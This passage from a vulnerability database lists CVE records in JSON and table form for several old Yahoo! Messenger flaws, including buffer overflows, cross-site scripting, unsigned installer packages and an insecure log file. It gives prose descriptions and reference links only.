| http://www.securityfocus.com/bid/5579 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T03:59:11.942Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "yahoo-installer-insecure-connection(9984)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "http://www.iss.net/security_center/static/9984.php"
},
{
"name": "20020827 Yahoo Messenger Install Secuirty",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html"
},
{
"name": "5579",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/5579"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The installer in Yahoo! Messenger 4.0, 5.0 and 5.5 does not verify package signatures which could allow remote attackers to install trojan programs via DNS spoofing."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2007-10-29T19:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "yahoo-installer-insecure-connection(9984)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "http://www.iss.net/security_center/static/9984.php"
},
{
"name": "20020827 Yahoo Messenger Install Secuirty",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html"
},
{
"name": "5579",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/5579"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-2361",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The installer in Yahoo! Messenger 4.0, 5.0 and 5.5 does not verify package signatures which could allow remote attackers to install trojan programs via DNS spoofing."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "yahoo-installer-insecure-connection(9984)",
"refsource": "XF",
"url": "http://www.iss.net/security_center/static/9984.php"
},
{
"name": "20020827 Yahoo Messenger Install Secuirty",
"refsource": "BUGTRAQ",
"url": "http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html"
},
{
"name": "5579",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/5579"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-2361",
"datePublished": "2007-10-29T19:00:00Z",
"dateReserved": "2007-10-29T00:00:00Z",
"dateUpdated": "2024-09-17T01:20:44.264Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-0768 (GCVE-0-2007-0768)
Vulnerability from cvelistv5
Published
2007-02-06 02:00
Modified
2024-08-07 12:34
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/22269 | vdb-entry, x_refsource_BID | |
| http://www.securityfocus.com/archive/1/458225/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://www.securityfocus.com/archive/1/458305/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://secunia.com/advisories/23928 | third-party-advisory, x_refsource_SECUNIA | |
| http://osvdb.org/31674 | vdb-entry, x_refsource_OSVDB | |
| http://www.securityfocus.com/archive/1/458494/100/0/threaded | mailing-list, x_refsource_BUGTRAQ |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T12:34:19.794Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "22269",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/22269"
},
{
"name": "20070126 Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
},
{
"name": "20070127 RE: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
},
{
"name": "23928",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/23928"
},
{
"name": "31674",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/31674"
},
{
"name": "20070127 Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-01-26T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "22269",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/22269"
},
{
"name": "20070126 Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
},
{
"name": "20070127 RE: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
},
{
"name": "23928",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/23928"
},
{
"name": "31674",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/31674"
},
{
"name": "20070127 Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-0768",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "22269",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/22269"
},
{
"name": "20070126 Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
},
{
"name": "20070127 RE: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
},
{
"name": "23928",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/23928"
},
{
"name": "31674",
"refsource": "OSVDB",
"url": "http://osvdb.org/31674"
},
{
"name": "20070127 Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-0768",
"datePublished": "2007-02-06T02:00:00",
"dateReserved": "2007-02-05T00:00:00",
"dateUpdated": "2024-08-07T12:34:19.794Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2006-6603 (GCVE-0-2006-6603)
Vulnerability from cvelistv5
Published
2006-12-15 22:00
Modified
2024-08-07 20:33
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Buffer overflow in the YMMAPI.YMailAttach ActiveX control (ymmapi.dll) before 2005.1.1.4 in Yahoo! Messenger allows remote attackers to execute arbitrary code via a crafted HTML document. NOTE: some details were obtained from third party information.
References
| ▼ | URL | Tags |
|---|---|---|
| http://securitytracker.com/id?1017387 | vdb-entry, x_refsource_SECTRACK | |
| http://www.securityfocus.com/bid/21607 | vdb-entry, x_refsource_BID | |
| http://www.kb.cert.org/vuls/id/901852 | third-party-advisory, x_refsource_CERT-VN | |
| http://www.vupen.com/english/advisories/2006/5016 | vdb-entry, x_refsource_VUPEN | |
| http://messenger.yahoo.com/security_update.php?id=120806 | x_refsource_CONFIRM | |
| http://secunia.com/advisories/23401 | third-party-advisory, x_refsource_SECUNIA |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T20:33:59.472Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1017387",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1017387"
},
{
"name": "21607",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/21607"
},
{
"name": "VU#901852",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/901852"
},
{
"name": "ADV-2006-5016",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2006/5016"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security_update.php?id=120806"
},
{
"name": "23401",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/23401"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-12-15T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the YMMAPI.YMailAttach ActiveX control (ymmapi.dll) before 2005.1.1.4 in Yahoo! Messenger allows remote attackers to execute arbitrary code via a crafted HTML document. NOTE: some details were obtained from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2009-02-26T10:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1017387",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1017387"
},
{
"name": "21607",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/21607"
},
{
"name": "VU#901852",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/901852"
},
{
"name": "ADV-2006-5016",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2006/5016"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security_update.php?id=120806"
},
{
"name": "23401",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/23401"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2006-6603",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in the YMMAPI.YMailAttach ActiveX control (ymmapi.dll) before 2005.1.1.4 in Yahoo! Messenger allows remote attackers to execute arbitrary code via a crafted HTML document. NOTE: some details were obtained from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1017387",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1017387"
},
{
"name": "21607",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/21607"
},
{
"name": "VU#901852",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/901852"
},
{
"name": "ADV-2006-5016",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2006/5016"
},
{
"name": "http://messenger.yahoo.com/security_update.php?id=120806",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security_update.php?id=120806"
},
{
"name": "23401",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/23401"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2006-6603",
"datePublished": "2006-12-15T22:00:00",
"dateReserved": "2006-12-15T00:00:00",
"dateUpdated": "2024-08-07T20:33:59.472Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3638 (GCVE-0-2007-3638)
Vulnerability from cvelistv5
Published
2007-07-10 00:00
Modified
2024-08-07 14:21
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/24784 | vdb-entry, x_refsource_BID | |
| http://www.wslabi.com/wabisabilabi/initPublishedBid.do? | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:21:36.599Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "24784",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24784"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-07-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2007-07-27T09:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "24784",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24784"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3638",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "24784",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24784"
},
{
"name": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?",
"refsource": "MISC",
"url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3638",
"datePublished": "2007-07-10T00:00:00",
"dateReserved": "2007-07-09T00:00:00",
"dateUpdated": "2024-08-07T14:21:36.599Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-0268 (GCVE-0-2012-0268)
Vulnerability from cvelistv5
Published
2012-01-19 15:00
Modified
2024-09-17 01:46
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow.
References
| ▼ | URL | Tags |
|---|---|---|
| http://secunia.com/advisories/47041 | third-party-advisory, x_refsource_SECUNIA |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T18:16:20.094Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "47041",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/47041"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-01-19T15:00:00Z",
"orgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"shortName": "flexera"
},
"references": [
{
"name": "47041",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/47041"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "PSIRT-CNA@flexerasoftware.com",
"ID": "CVE-2012-0268",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "47041",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/47041"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"assignerShortName": "flexera",
"cveId": "CVE-2012-0268",
"datePublished": "2012-01-19T15:00:00Z",
"dateReserved": "2011-12-30T00:00:00Z",
"dateUpdated": "2024-09-17T01:46:26.816Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2005-1671 (GCVE-0-2005-1671)
Vulnerability from cvelistv5
Published
2005-05-19 04:00
Modified
2024-08-07 21:59
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
The Logfile feature in Yahoo! Messenger 5.x through 6.0 can be activated by a YMSGR: URL and writes all output to a single ypager.log file, even when there are multiple users, and does not properly warn later users that the feature has been enabled, which allows local users to obtain sensitive information from other users.
References
| ▼ | URL | Tags |
|---|---|---|
| http://marc.info/?l=bugtraq&m=111643475210982&w=2 | mailing-list, x_refsource_BUGTRAQ |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T21:59:23.523Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20050518 Yahoo! Messenger may be storing all session data \u0027Unencoded\u0027 on the local machine",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=111643475210982\u0026w=2"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2005-05-18T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The Logfile feature in Yahoo! Messenger 5.x through 6.0 can be activated by a YMSGR: URL and writes all output to a single ypager.log file, even when there are multiple users, and does not properly warn later users that the feature has been enabled, which allows local users to obtain sensitive information from other users."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-10-17T13:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20050518 Yahoo! Messenger may be storing all session data \u0027Unencoded\u0027 on the local machine",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=111643475210982\u0026w=2"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-1671",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Logfile feature in Yahoo! Messenger 5.x through 6.0 can be activated by a YMSGR: URL and writes all output to a single ypager.log file, even when there are multiple users, and does not properly warn later users that the feature has been enabled, which allows local users to obtain sensitive information from other users."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20050518 Yahoo! Messenger may be storing all session data \u0027Unencoded\u0027 on the local machine",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=111643475210982\u0026w=2"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-1671",
"datePublished": "2005-05-19T04:00:00",
"dateReserved": "2005-05-19T00:00:00",
"dateUpdated": "2024-08-07T21:59:23.523Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-0031 (GCVE-0-2002-0031)
Vulnerability from cvelistv5
Published
2002-06-11 04:00
Modified
2024-08-08 02:35
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.cert.org/advisories/CA-2002-16.html | third-party-advisory, x_refsource_CERT | |
| http://www.kb.cert.org/vuls/id/137115 | third-party-advisory, x_refsource_CERT-VN | |
| http://online.securityfocus.com/archive/1/274223 | mailing-list, x_refsource_BUGTRAQ | |
| http://www.securityfocus.com/bid/4837 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T02:35:17.601Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "CA-2002-16",
"tags": [
"third-party-advisory",
"x_refsource_CERT",
"x_transferred"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "VU#137115",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/137115"
},
{
"name": "20020527 Yahoo Messenger - Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://online.securityfocus.com/archive/1/274223"
},
{
"name": "4837",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/4837"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-05-27T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2002-06-15T09:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "CA-2002-16",
"tags": [
"third-party-advisory",
"x_refsource_CERT"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "VU#137115",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/137115"
},
{
"name": "20020527 Yahoo Messenger - Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://online.securityfocus.com/archive/1/274223"
},
{
"name": "4837",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/4837"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-0031",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend."
}
]
},
"problemtype": {
"problemtype_data": [
{
